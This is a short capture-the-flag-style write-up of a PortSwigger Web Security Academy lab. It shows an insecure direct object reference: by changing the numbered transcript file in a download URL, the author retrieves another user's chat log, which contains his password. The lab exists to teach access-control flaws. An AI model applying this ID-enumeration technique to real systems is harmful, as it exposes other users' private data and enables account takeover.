| Field | Details |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Access Control (IDOR, Static Transcript URLs) |
| Difficulty | Apprentice |
| Objective | Find the password for the user carlos and log into their account |
Insecure Direct Object References¶
Going to the live chat, there's a "view transcript" option.
Viewing the transcript downloads 2.txt:
CONNECTED: -- Now chatting with Hal Pline --<br/>You: holaa<br/>Hal Pline: Are you sure you want to know the answer to that?
Intercepting this on Burp:
POST /download-transcript HTTP/2
Host: 0a5000950405972383cc9d2d0056008f.web-security-academy.net
(...)
HTTP/2 302 Found
Location: /download-transcript/4.txt
Following the redirect:
GET /download-transcript/4.txt HTTP/2
Host: 0a5000950405972383cc9d2d0056008f.web-security-academy.net
HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
CONNECTED: -- Now chatting with Hal Pline --<br/>You: holaa<br/>Hal Pline: Are you sure you want to know the answer to that?<br/>System: --- Disconnected ---<br/>You: holaa<br/>Hal Pline: Are you sure you want to know the answer to that?<br/>Hal Pline: I heard you the first time, I just can't be bothered to answer you<br/>CONNECTED: -- Now chatting with Hal Pline --<br/>You: tetooo<br/>Hal Pline: Can't you just google it?
Transcripts are stored as plain numbered files, served directly off the filesystem. Trying a lower number:
GET /download-transcript/1.txt HTTP/2
Host: 0a5000950405972383cc9d2d0056008f.web-security-academy.net
This is Carlos's chat transcript, and it contains his password. Logging in as carlos with it solves the lab.
And that get's the lab solved